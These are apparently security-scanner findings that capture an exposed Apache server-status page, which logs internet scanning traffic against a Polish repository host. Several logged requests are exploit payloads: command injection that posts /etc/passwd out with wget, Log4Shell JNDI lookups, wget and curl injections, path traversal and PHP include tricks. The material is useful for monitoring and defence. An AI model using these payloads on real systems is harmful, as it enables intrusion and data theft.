0.004899258109930.00.0014.21 217.15.165.91http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 0-119-0/0/2152. 0.00489907749030.00.0012.89 220.158.159.173http/1.1 0-119-0/0/2211. 0.00489908005050.00.0017.53 185.91.69.110http/1.1vm-repo-prd.nimoz.local:80GET stager64 HTTP/1.1 1-120204400/0/1919_ 0.0015344267356920.00.0015.09 57.152.56.138http/1.1 1-120204400/1/1606_ 0.014266352030.00.0111.37 159.203.96.42http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-120204400/0/1661_ 0.0032446374470.00.0012.92 159.203.96.42h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-120204400/0/1750_ 0.004196798220.00.0010.95 62.210.101.195http/1.1repo.nimoz.pl:443GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_p 1-120204400/0/1792_ 0.0043096729340.00.0014.51 159.203.96.42h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-120204400/0/1880_ 0.008614017019060.00.0013.26 62.210.101.195http/1.1repo.nimoz.pl:443GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=ht 1-120204400/1/1750_ 0.00171206544880.00.0011.44 45.156.130.8http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-120204400/0/1833_ 0.0022036525130.00.0011.74 159.203.96.42http/1.1 1-120204400/1/1811_ 0.051196295280.00.0111.02 159.203.96.42http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-120204400/1/1830_ 0.051186578620.00.0112.61 159.203.96.42http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-120204400/0/1792_ 0.0043246448860.00.0011.70 159.203.96.42h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-120204400/1/1766W 0.00006716690.00.0011.48 159.203.96.42http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-120204400/0/1941_ 0.0017073517020170.00.0012.46 62.210.101.195http/1.1repo.nimoz.pl:443GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,htt 1-120204400/1/1719_ 0.050186369540.00.0111.09 159.203.96.42http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-120204400/0/1781_ 0.007853577168750.00.0011.33 93.174.93.12http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x02\x01o\x01 1-120204400/0/1827_ 0.0048064086653400.00.0011.24 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/v3/user/orgs HTTP/1.1 1-120204400/0/1816_ 0.0003776316830.00.0010.95 62.210.101.195http/1.1repo.nimoz.pl:443POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 1-120204400/1/1750_ 0.0086106377930.00.0012.09 80.75.212.46http/1.1vm-repo-prd.nimoz.local:80GET /login.rsp HTTP/1.1 1-120204400/0/1670_ 0.0017073576218940.00.0010.93 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd% 1-120204400/0/1819_ 0.0032246424060.00.0012.39 159.203.96.42http/1.1 1-120204400/0/1825_ 0.0032616678020.00.0011.68 159.203.96.42http/1.1 1-120204400/0/1965_ 0.0028434026289660.00.0011.04 20.118.69.86http/1.1 1-120204400/0/1784_ 0.0004366763130.00.0010.64 62.210.101.195http/1.1repo.nimoz.pl:443GET /portal/info.jsp HTTP/1.1 1-120204400/0/1873_ 0.00306845090.00.0013.15 159.203.96.42http/1.1 1-120204400/0/1740_ 0.007853726204140.00.0010.85 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 2-86159040/1917/2392_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448d814a0c6
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 16-Oct-2024 00:06:09 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 119 Parent Server MPM Generation: 118 Server uptime: 117 days 11 hours 33 minutes Server load: 0.00 0.00 0.00 Total accesses: 257460 - Total Traffic: 35.2 GB - Total Duration: 108163408 CPU Usage: u171.7 s150.6 cu745.84 cs113 - .0116% CPU load .0254 requests/sec - 3720 B/second - 143.3 kB/request - 420.117 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011921no0yes124000 215904no (old gen)0yes025000 511922no0yes025000 Sum300 174000 ______________W__________.........................______________ ___________..................................................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-118119210/0/2167_ 0.006407823410.00.0015.46 198.235.24.89http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-118119210/0/2059_ 0.0061278204910.00.0012.74 154.213.199.83http/1.1repo.nimoz.pl:443GET /RDWeb/Pages/ HTTP/1.1 0-118119210/1/2171_ 0.002247658250.00.0113.79 159.65.18.197http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-118119210/0/2224_ 0.00207762370.00.0013.31 103.207.36.74http/1.1vm-repo-prd.nimoz.local:80GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 0-118119210/0/2184_ 0.002278385100.00.0013.61 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-118119210/0/2114_ 0.0036718387800.00.0012.96 103.207.36.74http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 0-118119210/0/2042_ 0.0036708381090.00.0012.69 103.207.36.74http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 0-118119210/0/2259_ 0.00367018793380.00.001533.32 103.207.36.74http/1.1 0-118119210/0/2208_ 0.0036708108910.00.0034.34 44.220.185.240http/1.1 0-118119210/0/1975_ 0.00367247836680.00.0012.72 44.220.185.240http/1.1 0-118119210/0/2302_ 0.0036708389250.00.0016.29 185.224.128.47http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-118119210/0/2604_ 0.003672096939890.00.0031189.83 44.220.185.240http/1.1 0-118119210/0/2023_ 0.0036707701230.00.0013.99 44.220.185.240http/1.1 0-118119210/0/2132_ 0.00367227775480.00.0015.42 44.220.185.240http/1.1 0-118119210/0/2116W 0.00008219850.00.0038.45 159.65.18.197http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-118119210/0/2125_ 0.000257397100.00.0012.69 44.220.185.240http/1.1 0-118119210/1/2210_ 0.050187988430.00.0114.31 159.65.18.197http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-118119210/1/2077_ 0.050187939740.00.0115.70 159.65.18.197http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-118119210/1/2097_ 0.051197626410.00.0112.17 159.65.18.197http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-118119210/0/2032_ 0.0012110309630.00.00188.38 159.65.18.197http/1.1 0-118119210/0/2201_ 0.001238295870.00.0012.83 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-118119210/0/2111_ 0.00108457760.00.0013.63 159.65.18.197http/1.1 0-118119210/0/2182_ 0.001288094680.00.0014.13 159.65.18.197http/1.1 0-118119210/0/2135_ 0.00107732790.00.0012.81 159.65.18.197http/1.1 0-118119210/0/2164_ 0.002227917680.00.0016.65 159.65.18.197h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-115-0/0/1919. 0.001731644267356920.00.0015.09 62.210.101.195http/1.1repo.nimoz.pl:443POST /functionRouter HTTP/1.1 1-115-0/0/1605. 0.001731643866351760.00.0011.36 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-115-0/0/1661. 0.001731642446374470.00.0012.92 62.210.101.195http/1.1repo.nimoz.pl:443POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleCon 1-115-0/0/1750. 0.00173164196798220.00.0010.95 62.210.101.195http/1.1repo.nimoz.pl:443GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_p 1-115-0/0/1792. 0.001731643096729340.00.0014.51 62.210.101.195http/1.1repo.nimoz.pl:443POST /system/sharedir.php HTTP/1.1 1-115-0/0/1880. 0.001731644017019060.00.0013.26 62.210.101.195http/1.1repo.nimoz.pl:443GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=ht 1-115-0/0/1749. 0.001731644226544880.00.0011.44 167.94.138.126http/1.1 1-115-0/0/1833. 0.001731642036525130.00.0011.74 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 1-115-0/0/1810. 0.001731642496295080.00.0011.00 62.210.101.195http/1.1repo.nimoz.pl:443POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 1-115-0/0/1829. 0.001731642686578440.00.0012.60 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/geojson?url=${jndi:ldap://${:-566}${:-214}.${hostName} 1-115-0/0/1792. 0.001731643246448860.00.0011.70 62.210.101.195http/1.1repo.nimoz.pl:443GET /backupmgt/localJob.php?session=fail;wget+http://cs5vtu83sf 1-115-0/0/1765. 0.001731643916716690.00.0011.48 62.210.101.195http/1.1repo.nimoz.pl:443POST /suite-api/api/auth/token/acquire HTTP/1.1 1-115-0/0/1941. 0.001731643517020170.00.0012.46 62.210.101.195http/1.1repo.nimoz.pl:443GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,htt 1-115-0/0/1718. 0.001731642806369360.00.0011.08 62.210.101.195http/1.1repo.nimoz.pl:443POST /runners/start HTTP/1.1 1-115-0/0/1781. 0.001731643577168750.00.0011.33 62.210.101.195http/1.1repo.nimoz.pl:443POST /goform/setSysAdm HTTP/1.1 1-115-0/0/1827. 0.001731644086653400.00.0011.24 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/v3/user/orgs HTTP/1.1 1-115-0/0/1816. 0.001731643776316830.00.0010.95 62.210.101.195http/1.1repo.nimoz.pl:443POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 1-115-0/0/1749. 0.001731643966377930.00.0012.09 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/media-library-assistant/includes/mla-st 1-115-0/0/1670. 0.001731643576218940.00.0010.93 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd% 1-115-0/0/1819. 0.001731642246424060.00.0012.39 62.210.101.195http/1.1repo.nimoz.pl:443POST /plugins/ueditor/php/controller.php?action=catchimage&upfo 1-115-0/0/1825. 0.001731642616678020.00.0011.68 62.210.101.195http/1.1repo.nimoz.pl:443GET /speedtest?url=cs5vtu83sf851a15g5k01yirrrn97h7bw.ish-asi.se 1-115-0/0/1965. 0.001731644026289660.00.0011.04 80.242.208.68http/1.1 1-115-0/0/1784. 0.001731644366763130.00.0010.64 62.210.101.195http/1.1repo.nimoz.pl:443GET /portal/info.jsp HTTP/1.1 1-115-0/0/1873. 0.0017316406845090.00.0013.15 80.242.208.68http/1.1vm-repo-prd.nimoz.local:80POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_ 1-115-0/0/1740
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44841e1cf08
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Monday, 14-Oct-2024 00:47:46 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 117 Parent Server MPM Generation: 116 Server uptime: 115 days 12 hours 14 minutes 38 seconds Server load: 0.00 0.00 0.00 Total accesses: 255592 - Total Traffic: 1.6 GB - Total Duration: 96209472 CPU Usage: u170.18 s149.02 cu663.87 cs47.43 - .0103% CPU load .0256 requests/sec - 173 B/second - 6.6 kB/request - 376.418 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 029338no0yes124000 215904no (old gen)0yes025000 529339no0yes025000 Sum300 174000 ___________________W_____.........................______________ ___________..................................................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-116293380/1/2100_ 0.004207729120.00.0014.05 93.174.93.12http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-116293380/0/2033_ 0.004217368168870.00.0012.68 62.210.101.195http/1.1repo.nimoz.pl:443GET /data.gz HTTP/1.1 0-116293380/2/2148_ 0.061247634130.00.0313.70 159.89.17.243http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116293380/0/2201_ 0.0018307739220.00.0013.24 62.210.101.195http/1.1repo.nimoz.pl:443GET /downFile.php?filename=../../../../etc/passwd HTTP/1.1 0-116293380/1/2145_ 0.01108333310.00.0013.38 209.38.19.8http/1.1repo.nimoz.pl:443GET /alive.php HTTP/1.1 0-116293380/1/2098_ 0.110178353390.00.0112.90 159.89.17.243http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-116293380/0/1986_ 0.00014468221560.00.0012.48 159.89.17.243http/1.1 0-116293380/0/2178_ 0.00012847688850.00.0016.12 159.89.17.243h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-116293380/2/2182_ 0.100187921540.00.0312.59 159.89.17.243http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-116293380/1/1934_ 0.050177580760.00.0112.54 209.38.19.8http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-116293380/0/2251_ 0.00014418258930.00.0015.76 159.89.17.243http/1.1 0-116293380/0/2151_ 0.0008747966920.00.0012.93 62.210.101.195http/1.1repo.nimoz.pl:443POST /login/dologin HTTP/1.1 0-116293380/1/1999_ 0.100177636520.00.0113.91 159.89.17.243http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-116293380/0/2104_ 0.00110407689840.00.0015.31 159.89.17.243h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-116293380/1/2017_ 0.110177686360.00.0112.19 159.89.17.243http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-116293380/0/2099_ 0.00012167329220.00.0012.60 159.89.17.243h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-116293380/0/2182_ 0.00015977947610.00.0014.20 159.89.17.243http/1.1 0-116293380/0/2044_ 0.00017257890460.00.0015.58 159.89.17.243http/1.1 0-116293380/1/2073_ 0.100177513080.00.0112.06 159.89.17.243http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-116293380/1/1989W 0.05007657900.00.0012.11 159.89.17.243http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-116293380/0/2164_ 0.0060916058249520.00.0012.59 62.210.101.195http/1.1repo.nimoz.pl:443GET /data.rar HTTP/1.1 0-116293380/0/2076_ 0.0060915578277190.00.0013.49 62.210.101.195http/1.1repo.nimoz.pl:443GET /https://:@oast.me%5C@oast.me HTTP/1.1 0-116293380/0/2128_ 0.0051010158030310.00.0012.88 93.174.93.12http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x02\x01o\x01 0-116293380/0/2106_ 0.0050516077671650.00.0012.66 62.210.101.195http/1.1repo.nimoz.pl:443GET /https:/%5C/%5Coast.me HTTP/1.1 0-116293380/1/2133_ 0.054707883330.00.0016.56 178.211.139.188http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-115-0/0/1919. 0.0028614267356920.00.0015.09 62.210.101.195http/1.1repo.nimoz.pl:443POST /functionRouter HTTP/1.1 1-115-0/0/1605. 0.0028613866351760.00.0011.36 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-115-0/0/1661. 0.0028612446374470.00.0012.92 62.210.101.195http/1.1repo.nimoz.pl:443POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleCon 1-115-0/0/1750. 0.002861196798220.00.0010.95 62.210.101.195http/1.1repo.nimoz.pl:443GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_p 1-115-0/0/1792. 0.0028613096729340.00.0014.51 62.210.101.195http/1.1repo.nimoz.pl:443POST /system/sharedir.php HTTP/1.1 1-115-0/0/1880. 0.0028614017019060.00.0013.26 62.210.101.195http/1.1repo.nimoz.pl:443GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=ht 1-115-0/0/1749. 0.0028614226544880.00.0011.44 167.94.138.126http/1.1 1-115-0/0/1833. 0.0028612036525130.00.0011.74 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 1-115-0/0/1810. 0.0028612496295080.00.0011.00 62.210.101.195http/1.1repo.nimoz.pl:443POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 1-115-0/0/1829. 0.0028612686578440.00.0012.60 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/geojson?url=${jndi:ldap://${:-566}${:-214}.${hostName} 1-115-0/0/1792. 0.0028613246448860.00.0011.70 62.210.101.195http/1.1repo.nimoz.pl:443GET /backupmgt/localJob.php?session=fail;wget+http://cs5vtu83sf 1-115-0/0/1765. 0.0028613916716690.00.0011.48 62.210.101.195http/1.1repo.nimoz.pl:443POST /suite-api/api/auth/token/acquire HTTP/1.1 1-115-0/0/1941. 0.0028613517020170.00.0012.46 62.210.101.195http/1.1repo.nimoz.pl:443GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,htt 1-115-0/0/1718. 0.0028612806369360.00.0011.08 62.210.101.195http/1.1repo.nimoz.pl:443POST /runners/start HTTP/1.1 1-115-0/0/1781. 0.0028613577168750.00.0011.33 62.210.101.195http/1.1repo.nimoz.pl:443POST /goform/setSysAdm HTTP/1.1 1-115-0/0/1827. 0.0028614086653400.00.0011.24 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/v3/user/orgs HTTP/1.1 1-115-0/0/1816. 0.0028613776316830.00.0010.95 62.210.101.195http/1.1repo.nimoz.pl:443POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 1-115-0/0/1749. 0.0028613966377930.00.0012.09 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/media-library-assistant/includes/mla-st 1-115-0/0/1670. 0.0028613576218940.00.0010.93 62.210.101.195http/1.1repo.nimoz.pl:443GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd% 1-115-0/0/1819. 0.0028612246424060.00.0012.39 62.210.101.195http/1.1repo.nimoz.pl:443POST /plugins/ueditor/php/controller.php?action=catchimage&upfo 1-115-0/0/1825. 0.0028612616678020.00.0011.68 62.210.101.195http/1.1repo.nimoz.pl:443GET /speedtest?url=cs5vtu83sf851a15g5k01yirrrn97h7bw.ish-asi.se 1-115-0/0/1965. 0.0028614026289660.00.0011.04 80.242.208.68http/1.1 1-115-0/0/1784. 0.0028614366763130.00.0010.64 62.210.101.195http/1.1repo.nimoz.pl:443GET /portal/info.jsp HTTP/1.1 1-115-0/0/1873</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44842e5039d
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Saturday, 12-Oct-2024 00:46:26 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 113 days 12 hours 13 minutes 17 seconds Server load: 0.00 0.00 0.00 Total accesses: 211737 - Total Traffic: 1.3 GB - Total Duration: 78381337 CPU Usage: u149.74 s145.79 cu577.38 cs41.74 - .00933% CPU load .0216 requests/sec - 147 B/second - 6.7 kB/request - 370.183 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 122313no0yes124000 215904no (old gen)0yes025000 522314no0yes025000 Sum300 174000 .........................____W__________________________________ ___________..................................................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-109-0/0/1749. 0.003483771715764930.00.0011.99 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 0-109-0/0/1603. 0.003483773245731020.00.0010.47 62.210.101.195http/1.1repo.nimoz.pl:443GET /login/ HTTP/1.1 0-109-0/0/1676. 0.00348377425579130.00.0011.24 62.210.101.195http/1.1repo.nimoz.pl:443POST /app HTTP/1.1 0-109-0/0/1770. 0.003483771625795840.00.0010.94 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/canto/readme.txt HTTP/1.1 0-109-0/0/1738. 0.003483773326340250.00.0011.09 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 0-109-0/0/1680. 0.003483773726179610.00.0010.69 206.168.34.60http/1.1 0-109-0/0/1548. 0.003483773476264040.00.0010.02 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 0-109-0/0/1771. 0.00348377675797960.00.0013.64 62.210.101.195http/1.1 0-109-0/0/1807. 0.003483773535941140.00.0010.30 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/media-library-assistant/readme.txt HTTP 0-109-0/0/1518. 0.0034837705706390.00.009.92 62.210.101.195http/1.1repo.nimoz.pl:443GET /linusadmin-phpinfo.php HTTP/1.1 0-109-0/0/1844. 0.003483771396253670.00.0013.41 62.210.101.195http/1.1repo.nimoz.pl:443GET /nagiosxi/login.php HTTP/1.1 0-109-0/0/1722. 0.003483773796146670.00.0010.52 62.210.101.195http/1.1repo.nimoz.pl:443POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 0-109-0/0/1669. 0.003483771895973360.00.0011.89 62.210.101.195http/1.1repo.nimoz.pl:443GET /prweb/ HTTP/1.1 0-109-0/0/1712. 0.003483771395647060.00.0012.91 62.210.101.195http/1.1repo.nimoz.pl:443GET /user/login HTTP/1.1 0-109-0/0/1577. 0.003483772915690170.00.009.89 62.210.101.195http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 0-109-0/0/1724. 0.003483772935516120.00.0010.24 62.210.101.195http/1.1repo.nimoz.pl:443POST /webtools/control/SOAPService HTTP/1.1 0-109-0/0/1697. 0.00348377685812640.00.0011.67 62.210.101.195http/1.1repo.nimoz.pl:443GET /login HTTP/1.1 0-109-0/0/1625. 0.00348377476138260.00.0013.30 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-109-0/0/1656. 0.003483774555607750.00.009.68 62.210.101.195http/1.1repo.nimoz.pl:443GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwi 0-109-0/0/1578. 0.00348377645814460.00.009.91 5.181.190.29http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-109-0/0/1753. 0.003483773286449130.00.0010.31 62.210.101.195http/1.1repo.nimoz.pl:443GET /user/login HTTP/1.1 0-109-0/0/1662. 0.003483771385870190.00.0010.94 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01\x05\xa8\x01 0-109-0/0/1653. 0.003483773706142000.00.0010.16 62.210.101.195http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-109-0/0/1635. 0.003483771765881530.00.0010.31 62.210.101.195http/1.1repo.nimoz.pl:443GET /goanywhere/auth/Login.xhtml HTTP/1.1 0-109-0/0/1750. 0.003483771075946330.00.0014.50 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php HTTP/1.1 1-114223130/0/1765_ 0.00272206608900.00.0014.27 48.217.211.229http/1.1 1-114223130/1/1499_ 0.054215628920.00.0110.78 192.46.211.230http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-114223130/0/1512_ 0.00278005825780.00.0012.21 165.22.189.97http/1.1 1-114223130/0/1616_ 0.00006157250.00.0010.28 185.224.128.47http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-114223130/0/1648W 0.00005888230.00.0013.77 192.46.211.230http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-114223130/0/1734_ 0.00106390700.00.0012.50 172.206.147.162http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 1-114223130/0/1559_ 0.00105834780.00.0010.77 185.224.128.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-114223130/1/1692_ 0.051196068070.00.0111.10 192.46.211.230http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-114223130/1/1663_ 0.052185625180.00.0110.33 192.46.211.230http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-114223130/0/1653_ 0.00605868890.00.0011.81 192.46.211.230http/1.1 1-114223130/0/1671_ 0.006245876970.00.0011.04 192.46.211.230h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-114223130/0/1674_ 0.00705892000.00.0010.95 192.46.211.230http/1.1 1-114223130/0/1772_ 0.007266421030.00.0011.75 192.46.211.230http/1.1 1-114223130/0/1593_ 0.00805753250.00.0010.31 192.46.211.230http/1.1 1-114223130/0/1640_ 0.008206316910.00.0010.61 192.46.211.230h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-114223130/0/1643_ 0.00805776660.00.0010.40 192.46.211.230h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-114223130/0/1616_ 0.00925662730.00.0010.22 154.213.189.21http/1.1vm-repo-prd.nimoz.local:80POST /login.cgi HTTP/1.1 1-114223130/1/1539_ 0.0110245754210.00.0111.20 192.46.211.230http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-114223130/0/1528_ 0.0072205721480.00.0010.25 54.227.122.167http/1.1 1-114223130/0/1674_ 0.0072605763870.00.0011.52 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-114223130/0/1660_ 0.0073005925250.00.0010.99 167.94.138.126http/1.1 1-114223130/0/1726_ 0.0073505562730.00.0010.16 4.151.229.13http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-114223130/1/1633_ 0.0074006113790.00.009.99 185.224.128.67http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 1-114223130/0/1684_ 0.002556266003710.00.0012.40 40.85.155.195http/1.1 1-114223130/1/1529_ 0.002556245627750.00.0110.13 57.152.56.220http/1.1repo.nimoz.pl:443GET / HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448ebc15e50
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 09-Oct-2024 23:54:13 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 112 Parent Server MPM Generation: 111 Server uptime: 111 days 11 hours 21 minutes 5 seconds Server load: 0.00 0.00 0.00 Total accesses: 211173 - Total Traffic: 1.3 GB - Total Duration: 78347910 CPU Usage: u152.99 s144.95 cu570.6 cs40.65 - .00944% CPU load .0219 requests/sec - 149 B/second - 6.6 kB/request - 371.013 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 17340no0yes124000 215904no (old gen)0yes025000 57341no0yes025000 Sum300 174000 .........................W______________________________________ ___________..................................................___ ______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-109-0/0/1749. 0.001724441715764930.00.0011.99 62.210.101.195http/1.1repo.nimoz.pl:443POST /minio/webrpc HTTP/1.1 0-109-0/0/1603. 0.001724443245731020.00.0010.47 62.210.101.195http/1.1repo.nimoz.pl:443GET /login/ HTTP/1.1 0-109-0/0/1676. 0.00172444425579130.00.0011.24 62.210.101.195http/1.1repo.nimoz.pl:443POST /app HTTP/1.1 0-109-0/0/1770. 0.001724441625795840.00.0010.94 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/canto/readme.txt HTTP/1.1 0-109-0/0/1738. 0.001724443326340250.00.0011.09 62.210.101.195http/1.1repo.nimoz.pl:443GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 0-109-0/0/1680. 